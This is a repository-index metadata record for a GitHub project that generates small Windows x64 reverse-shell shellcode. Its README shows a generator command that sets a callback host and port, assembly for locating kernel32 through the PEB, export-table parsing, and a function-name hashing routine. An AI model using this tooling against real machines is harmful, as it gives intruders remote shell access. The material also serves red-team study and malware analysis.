{"id":28795390,"url":"https://github.com/silentisvox/p0cket-shell","last_synced_at":"2026-04-24T11:38:39.108Z","repository":{"id":298043696,"uuid":"998666641","full_name":"SilentisVox/p0cket-shell","owner":"SilentisVox","description":"Smallest Reverse Shell Shellcode by p0cket-shell","archived":false,"fork":false,"pushed_at":"2025-06-17T20:40:49.000Z","size":69,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"master","last_synced_at":"2025-06-17T21:36:29.116Z","etag":null,"topics":["malware","malware-analysis","malware-development","offensive-security","payload","payload-generator","red-team","remote-access-tool","remote-access-trojan","remote-control","reverse-shell","shellcode","shellcode-generator","shellcode-loader","windows-shellcode","x64"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-3-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/SilentisVox.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-06-09T03:59:10.000Z","updated_at":"2025-06-17T20:40:53.000Z","dependencies_parsed_at":null,"dependency_job_id":"f975e0d0-4719-4db3-93c0-39c7d224fb0b","html_url":"https://github.com/SilentisVox/p0cket-shell","commit_stats":null,"previous_names":["silentisvox/p0cket-shell"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/SilentisVox/p0cket-shell","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SilentisVox%2Fp0cket-shell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Sil
entisVox%2Fp0cket-shell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SilentisVox%2Fp0cket-shell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SilentisVox%2Fp0cket-shell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/SilentisVox","download_url":"https://codeload.github.com/SilentisVox/p0cket-shell/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SilentisVox%2Fp0cket-shell/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":260477918,"owners_count":23015064,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["malware","malware-analysis","malware-development","offensive-security","payload","payload-generator","red-team","remote-access-tool","remote-access-trojan","remote-control","reverse-shell","shellcode","shellcode-generator","shellcode-loader","windows-shellcode","x64"],"created_at":"2025-06-18T03:07:32.294Z","updated_at":"2026-04-24T11:38:39.098Z","avatar_url":"https://github.com/SilentisVox.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# p0cket-shell\n\n[![Python](https://img.shields.io/badge/Python-%E2%89%A5%203.6-yellow.svg)](https://www.python.org/)\n\u003cimg src=\"https://img.shields.io/badge/Developed%20on-Windows%2011-1677CF\"\u003e\n[![License](https://img.shields.io/badge/License-BSD%203%20Clause%20license-C91515)](https://github.com/SilentisVox/Silence/blob/master/LICENSE)\n\u003cimg 
src=\"https://img.shields.io/badge/Maintained%3F-Yes-1FC408\"\u003e\n\np0cket-shell is the most compact reverse shell shellcode available.\nThe intention of this shellcode was to explore the least amount of instructions in an executable to establish a reverse shell.\nAlthough I do not think that the executable is objectively the smallest, it is miles smaller than what I originally researched.\n\n**Disclaimer**: The purpose of this generated shellcode is for educational purposes and testing only.\nDo not use this shellcode on machines you do not have permission to use.\nDo not use this shellcode to leverage and communicate with machines that you do not have authorization to use.\n\n## Installation\n\n```PowerShell\ngit clone https://github.com/SilentisVox/p0cket-shell\ncd p0cket-shell\npython p0cket-shell.py\n```\n\n## Usage\n\nGenerating the shellcode is simple.\nThe payload is a Windows x64 Reverse Shell, and can run on every Windows x64 machine `[2026-04-21]`.\nNo argument is mandatory, but any that are omitted will be filled with default values.\n\n- `LHOST=`, you must use a valid ip `0.0.0.0`.\n- `LPORT=`, you must use a valid port `0-65535`.\n- `EXITFUN=`, you may apply the values `process || thread`.\n- `FORMAT=`, you may apply the values `asm || c || powershell || python || raw`.\n\n```PowerShell\n\u003e python p0cket-shell.py                \\\nlhost=192.168.0.101                     \\\nlport=4444                              \\\nexitfun=thread                          \\\nformat=ps1\n\n[*] Payload size: 386 bytes\n[*] Final size of PowerShell file: 2646 bytes\n$Buffer = [Byte[]] @(\n        0x40, 0x80, 0xE4 ...\n```\n\n## How it works\n\nTo create a reverse shell, you must make a connection, and pass the respective socket object to a process' standard handles.\nThe functions of choice are `CreateProcessA` \u0026 `connect` (which subsequently require `WSAStartup` \u0026 `WSASocketA`).\nThese functions are located within `kernel32.dll` \u0026 `ws2_32.dll`.\n\n###### 
Elaboration at https://github.com/SilentisVox/Reverse-Shell-with-Indirect-Syscalls\n\nTo gather pointers to these functions, we must parse both modules and gather the address of each function.\nWe can gather the base address of `kernel32.dll` with a **PEB walk**;\nwe can load `ws2_32.dll` with the `LoadLibraryA` function from `kernel32.dll`.\n\n```x86asm\nGET_KERNEL32:\n        MOV     RAX,    GS:[0x60]               ; pTEB            + 0x60 =\u003e pPEB\n        MOV     RAX,    QWORD   [RAX + 0x18]    ; pPEB            + 0x18 =\u003e pLoaderData\n        MOV     RAX,    QWORD   [RAX + 0x30]    ; pLoaderData     + 0x30 =\u003e \n        MOV     RAX,    QWORD   [RAX]           ; pInLoadOrderModuleList =\u003e Flink\n        MOV     RAX,    QWORD   [RAX]           ; Flink                  =\u003e Flink\n        MOV     RAX,    QWORD   [RAX + 0x10]    ; Flink           + 0x10 =\u003e pModule\n```\n\nOnce the base address of a module is obtained, we can parse it for its symbol export data.\nThe data is laid out in individual fields that correspond to each other.\nKey fields from the **Export Directory** are: `NumberOfNames`, `NumberOfFunctions`, `AddressOfNames`, `AddressOfFunctions`, \u0026 `AddressOfNameOrdinals`.\n\n```\n; EXAMPLE\nExportDirectory:\n        0x18: XXXX XXXX ; NumberOfNames\n        0x1C: XXXX XXXX ; AddressOfFunctions\n        0x20: XXXX XXXX ; AddressOfNames\n        0x24: XXXX XXXX ; AddressOfNameOrdinals\n```\n\nTo gather a function's address, you must know which index it has in the exported name list.\nThe index × 2, added to `AddressOfNameOrdinals`, gives you the address of the ordinal slot.\nThe 2 byte value at that address is the ordinal of the function.\nThe ordinal value × 4, added to `AddressOfFunctions`, gives you the address of the function offset slot.\nThe 4 byte value at that address is the offset within the module to that function.\nThe base address + offset is the full address of the function.\n\nWhen resolving the function address, we 
must have some unique identifier for the function, such as its name, instructions taken from the function body, or a **hash** of the function name.\nThe simplest of hashing algorithms can be used.\n\n###### Example in Python\n\n```python\ndef ROR7__32(NAME: str) -\u003e int:\n        HASH = 0\n        for CHAR in NAME:\n                HASH = ((HASH \u003e\u003e 7) | (HASH \u003c\u003c 25)) \u0026 0xFFFFFFFF\n                HASH = (HASH + ord(CHAR)) \u0026 0xFFFFFFFF\n        return HASH\n```\n\n###### Example in assembly\n\n```x86asm\n        XOR     RAX,    RAX\n        XOR     RCX,    RCX\nROR7__32:\n        LODSB\n        CMP     AL,     0\n        JZ      EXIT\n        ROR     ECX,    7\n        ADD     ECX,    EAX\n        JMP     ROR7__32\nEXIT:\n        RET\n```","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsilentisvox%2Fp0cket-shell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsilentisvox%2Fp0cket-shell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsilentisvox%2Fp0cket-shell/lists"}